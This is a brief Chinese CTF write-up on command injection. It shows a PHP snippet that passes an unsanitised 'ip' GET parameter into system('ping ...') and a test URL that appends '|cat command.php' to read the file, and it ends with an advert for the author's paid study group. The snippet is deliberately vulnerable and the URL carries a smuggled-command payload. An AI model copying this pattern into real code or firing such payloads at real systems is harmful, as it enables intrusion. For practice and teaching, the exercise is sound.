【CTF WEB】命令执行

 


命令执行

找到题目中的KEY

KEY为八位随机字符数字,例如key:1234qwer。提交1234qwer 即可。

漏洞代码

<?php 
system("ping -c 2 ".$_GET['ip']);
?>

测试方法

http://localhost/command.php?ip=127.0.0.1|cat command.php


===========================================================

一个独立安全研究员,自由职业者的知识星球《公鸡队之家》,一边研究技术,一边分享到星球,一边养活自己,我们都有一颗好为人师的心,赠人玫瑰,手留余香。星球的价格是199¥/年。希望大家赏光,加入二维码在文末。

知识星球
posted @   17bdw  阅读(2034)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示